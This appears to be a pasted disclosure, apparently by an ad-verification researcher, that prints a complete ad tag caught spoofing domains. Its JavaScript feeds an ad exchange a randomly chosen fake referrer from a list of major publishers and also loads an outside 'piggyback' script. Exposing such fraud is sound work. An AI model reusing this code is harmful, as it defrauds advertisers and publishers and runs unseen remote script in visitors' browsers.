Domain spoofing in action

1. From:
2. http://s3.amazonaws.com/414413/23049103.html?cb=1419179557&referrer=independent.co.uk&pubclick=http://nym1.ib.adnxs.com/click?ZSMwxdW_bz9GTtk2y0loP_yp8dJNYrA_Rk7ZNstJaD9kIzDF1b9vP7Mw1WH4E5k7lK0Ww0IJvjgl9pZUAAAAAMlROgBGAQAAIQkAAAIAAACPs18BhHMCAAAAAQBVU0QAVVNEACwB-gBxJgAAsusDAQUCAQAAAAAAOiYffAAAAAA./cnd=%21xwYNQQiP9_wCEI_n_goYhOcJIAA./referrer=independent.co.uk/clickenc=
3.  
4. More info at:
5. http://www.adexchanger.com/the-sell-sider/the-publishers-guide-to-domain-spoofing/
6.  
7. --@j_rom_ // ClarityAd
8.  
9. ================================================
10. <html>
11. <head>
12. </head>
13. <body>
14.  
15. <div id="container">
16.  
17. </div>
18.  
19.  
20. <script type="text/javascript">
21.  
22. /*
23. Determine whether or not this tag will go to default or pass
24. */
25. var pass = true;
26.  
27. var w = '300'; // Width of the tag
28. var h = '250'; // Height of the tag
29.  
30.  
31. /*
32. Default creative parameters
33. */
34. var crtv = ''; // URL of the image to be shown here
35. var uri = ''; // URL to go to after the click
36.  
37. /*
38. Actual tag parameters
39. */
40. var id = '4002927'; //Appnexus id
41. // List of domains
42. var r = [
43.  
44. {weight: 0.35, value: '${referrer}'},
45. {weight: 1.2, value: 'babycenter.com'},
46. {weight: 1.3, value: 'food.com'},
47. {weight: 1.4, value: 'seventeen.com'},
48. {weight: 1.5, value: 'eatingwell.com'},
49. {weight: 1.9, value: 'familyeducation.com'},
50. {weight: 1.7, value: 'instructables.com'},
51. {weight: 1.4, value: 'merriam-webster.com'},
52. {weight: 1.1, value: 'slate.com'},
53. {weight: 2.0, value: 'epicurious.com'},
54. {weight: 2.3, value: 'foodandwine.com'},
55. {weight: 2.4, value: 'glamour.com'},
56. {weight: 2.3, value: 'gamespot.com'},
57. {weight: 2.7, value: 'timeanddate.com'},
58. {weight: 2.9, value: 'tripadvisor.com'},
59. {weight: 1.3, value: 'zillow.com'},
60. {weight: 1.0, value: 'expedia.com'},
61. {weight: 1.5, value: 'go.com'},
62. {weight: 1.9, value: 'jamieoliver.com'},
63. {weight: 1.5, value: 'twitch.tv'},
64. {weight: 1.9, value: 'mashable.com'},
65. {weight: 2.0, value: 'usatoday.com'},
66. {weight: 2.4, value: 'latimes.com'},
67. {weight: 2.8, value: 'washingtonpost.com'},
68. {weight: 2.5, value: 'nytimes.com'},
69. {weight: 1.7, value: 'rivals.com'},
70. {weight: 1.9, value: 'sportingnews.com'},
71. {weight: 2.2, value: 'reuters.com'},
72. {weight: 2.4, value: 'golf.com'},
73. {weight: 2.5, value: 'lifehacker.com'}
74.  
75.  
76.  
77. ];
78.  
79.  
80. /*********************************************************
81. Don't alter anything under this line
82. *********************************************************/
83.  
84.  
85. /**
86. * http://stackoverflow.com/a/901144/190032
87. * @param param name of the query paramter to search
88. * @param search window.location.search value
89. * @returns {string} the value of the query parameter or null if not found
90. */
91. function getURLParameter(param, search) {
92. param = param.replace(/[\[]/, "\\[").replace(/[\]]/, "\\]");
93. var regex = new RegExp("[\\?&]" + param + "=([^&#]*)");
94. var results = regex.exec(search);
95. return results == null ? null : decodeURIComponent(results[1].replace(/\+/g, " "));
96. }
97.  
98. /**
99. * Randomly pick one of the object in the array
100. * @param arr array
101. * @return a randomly chosen object in the array
102. * @throws error for arr null or not an array
103. */
104. function pickrandom(arr) {
105. if (!arr || !(arr instanceof Array)) {
106. throw new Error('pickRandom cannot pick from a non array object');
107. }
108. if (arr.length === 0) {
109. return null;
110. }
111. return arr[Math.floor(Math.random() * arr.length)];
112. }
113.  
114. /**
115. * For any object that does not have a weight property the pick will never return it
116. * if all objects don't have a weight property the first element is returns
117. * @param arr expected value is of type [{weight:x,value:y}]
118. * @returns {*}
119. */
120. function pickWeightedRandom(arr) {
121.  
122. if (!arr || !(arr instanceof Array)) {
123. throw new Error('pickRandom cannot pick from a non array object');
124. }
125.  
126. if (arr.length === 0) {
127. return null;
128. }
129.  
130. var total = 0;
131. for (var i = 0; i < arr.length; i++) {
132. var w = arr[i].weight;
133. if (!w) {
134. arr[i].weight = 0;
135. w = 0;
136. }
137. total += parseFloat(w);
138. }
139. var random = Math.random() * total;
140.  
141. var upto = 0;
142. for (var i = 0; i < arr.length; i++) {
143. var w = parseFloat(arr[i].weight);
144. if ((upto + w) > random) {
145. return arr[i];
146. }
147. upto += w;
148. }
149.  
150. return null;
151.  
152. }
153.  
154. /**
155. * Handles ref parameter
156. * @returns {string} a randomly chosen referrer, if the selection is of type ORGINAL
157. * then the actual referrer parameter is used
158. */
159. function handleRef() {
160.  
161. var pick = pickWeightedRandom(r);
162. if (!pick) {
163. return '';
164. }
165. var value = pick.value;
166. if (value === '${referrer}') {
167. value = getURLParameter('referrer', window.location.search);
168. }
169. value = (value ? value : '');
170. return encodeURIComponent(decodeURIComponent(value));
171. }
172.  
173. /**
174. * Show default static creative
175. */
176. function handleDefault() {
177. document.getElementById('container').innerHTML = '<a target="_blank" href="' + uri + '"><img src="' + crtv + '" border="0" height="' + h + '" width="' + w + '" class=""></a>';
178. }
179.  
180. /**
181. * Handle real tag
182. */
183. function handleTag() {
184. var cb = getURLParameter('cb', window.location.search) || new Date().getTime();
185. var pubclick = getURLParameter('pubclick', window.location.search) || '';
186. var ref = handleRef();
187.  
188. var ssl = "https:" == document.location.protocol;
189. var url = ssl ? "https://secure.adnxs.com" : "http://ib.adnxs.com";
190.  
191. document.getElementById('container').innerHTML =
192. '<IFRAME SRC="' + url + '/tt?id=' + id + '&cb=' + cb + '&referrer=' + ref + '&pubclick=' + encodeURIComponent(pubclick) + '" ' +
193. 'FRAMEBORDER="0" SCROLLING="no" MARGINHEIGHT="0" MARGINWIDTH="0" TOPMARGIN="0" LEFTMARGIN="0" ALLOWTRANSPARENCY="true" WIDTH="' + w + '" HEIGHT="' + h + '"></IFRAME>';
194. }
195.  
196. function loadPiggybacks() {
197. var js = document.createElement('script');
198. js.type = 'text/javascript';
199. js.src = (window.location.protocol === 'https:') ? 'https://lrmp-geverads.netdna-ssl.com/384906.js' : 'http://lrmp.geverads.netdna-cdn.com/384896.js';
200. document.getElementsByTagName('script')[0].appendChild(js);
201. }
202.  
203. try {
204. if (pass) {
205. handleTag();
206. } else {
207. handleDefault();
208. }
209. } catch (e) {
210. new Image().src = 'https://logs-01.loggly.com/inputs/acf77ff8-3ae5-4bf7-bd47-541179f42f52.gif?type=error&source=ipkiss&message=' + encodeURIComponent(e.message);
211. }
212.  
213. try {
214. loadPiggybacks();
215. } catch (e) {
216. new Image().src = 'https://logs-01.loggly.com/inputs/acf77ff8-3ae5-4bf7-bd47-541179f42f52.gif?type=error&source=ipkisspiggy&message=' + encodeURIComponent(e.message);
217. }
218.  
219.  
220. </script>
221. </body>
222. </html>